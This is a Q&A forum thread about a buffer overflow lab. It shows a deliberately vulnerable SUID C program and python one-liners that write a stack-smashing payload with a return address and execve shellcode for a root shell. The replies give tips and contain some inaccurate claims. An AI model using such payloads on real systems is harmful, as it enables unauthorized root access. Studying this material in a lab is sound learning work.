5

I have an application with the following source code:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];

    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

Inside bof with the strcpy(buffer, str) i am trying to achieve privelege escalation using buffer overflow. Inside gdb with the following command i am able to open a new shell: python -c 'print "A" * 24 + "\x60\xf1\xff\xbf" + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' > badfile
Outside gdb i know that the memory address change a bit so i have tried with the same command using some nops too: python -c 'print "A" * 24 + "\x60\xf1\xff\xbf" + "\x90" * 30 + "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"' > badfile
I have disabled ASLR, NX bit and stack canary. Though the result of the last command above is Illegal instruction (core dumped)What am i doing wrong here? (The suid bit of the application as root is enabled)

user2581671
  • 51
  • 1
  • the `fread` function does not NUL terminate the input buffer. so the call to `strcpy()` in the bof() function will result in undefined behaviour and as you saw, can lead to a seg fault event. The code should check the returned value from `fread()` to know the length of the read in string, so amongst other things, can NUL terminate the string – user3629249 Dec 28 '15 at 11:02
  • overfowing a buffer is very unlikely to achieve a privilege escalation, However it is very likely to result in a seg fault event – user3629249 Dec 28 '15 at 11:05
  • the `gdb` function has the memory layout a bit different so you might not see the seg fault event, That does not mean the code isn't still causing undefined behaviour\ – user3629249 Dec 28 '15 at 11:07
  • In gdb the memory map is different, so when you run the program the buffer overflow "does not work" like you wanted. – Millex Jun 12 '16 at 17:24

2 Answers2

1

You should familiarize yourself with the terminology. What you're trying to do has nothing to do with privilege escalation. What you want to do is code execution through buffer overflow. I suggest you read the input for overflowing the buffer from stdin (gets), that is a lot more straightforward than reading it from a file. You can then do

python -c "<python encoded binary payload>" | yourprogram

That should do the trick.

kaidentity
  • 2,634
  • 13
  • 30
0

You can put the payload in a python program and invoke the code as python payload.py; cat | /home/user/code

ashish
  • 127
  • 1
  • 6